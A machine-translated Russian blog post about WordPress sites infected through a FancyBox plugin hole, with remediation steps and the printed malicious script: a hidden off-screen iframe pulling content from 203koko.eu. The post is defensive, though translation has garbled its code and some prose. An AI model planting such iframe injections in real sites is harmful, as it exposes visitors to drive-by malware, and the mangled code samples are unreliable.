[Malware Iframe 203koko] Malware Зараженный WordPress сайты

Ранее на этой неделе ряд сайтов и блогов WordPress, получили предупреждения вредоносные инфекции через Google Webmasters.

Проблема, к которой Google Webmasters упоминается является наличие треска / скрипт вредоносные программы iframe исходные веб-сайтов.

<Script> если (navigator.userAgent.match (/ MSIE / я)) {document.write ( «<DIV стиль = "позицию: абсолютная; слева: -2000px; ширина: 2000px"> <IFRAME SRC =«HTTP: / /203koko.eu/hjnfh/ipframe2.php "ширина =" 20 "высота =" 30 «> </ IFRAME> </ DIV>«); } </ SCRIPT>

Кажется, что это уязвимость a плагинAcquis FancyBox для WordPress который до вчерашнего дня (05.02.2015) никогда не обновляются в течение длительного времени.
Решая эту проблему и лечения вирусов сайтов с этим вредоносным ПО, относительно просто.
1. Отключите подключаемый модуль FancyBox.
2. Удалите все плагины FancyBox с сервера (через FTP)
3. Установите новую версию плагина (FancyBox 3.0.4)

FancyBox для WordPress 3.0.4

- Переименован параметр, затронутый проблемой безопасности, упомянутой в 3.0.3. Это должно помешать появлению вредоносного кода на сайтах, где плагин обновляется без удаления вредоносного кода.

FancyBox для WordPress 3.0.3

Исправлена ​​проблема безопасности.

Информация о вредоносном ПО:

ТИП: Iframe перенаправление
TARGET: WordPress Fancybox
MALWARE домене: 203koko.eu
ВРЕДОНОСНЫЕ URI: http://203koko.eu/hjnfh/ipframe2.php
RAW вредоносный код: <IFRAME SRC = "http://203koko.eu/hjnfh/ipframe2.php" ширина = "20" высота = "30"> </ IFRAME>
MALWARE скрипт: <SCRIPT>, если ((/ / я) navigator.userAgent.match MSIE) {document.write ('<стиль = "позицию: абсолютная; слева: -2000px; ширина: 2000px" DIV>

Удаление вредоносных программ с вашего сайта WordPress.

[Malware Iframe 203koko] Malware Зараженный WordPress сайты

Об авторе

Stealth LP

Основатель и главный редактор Хитрость SettingsВ день 2006.
Опыт работы в операционных системах Linux (особенно CentOS), Mac OS X, Windows XP> Windows 10 и WordPress (CMS).

Оставить комментарий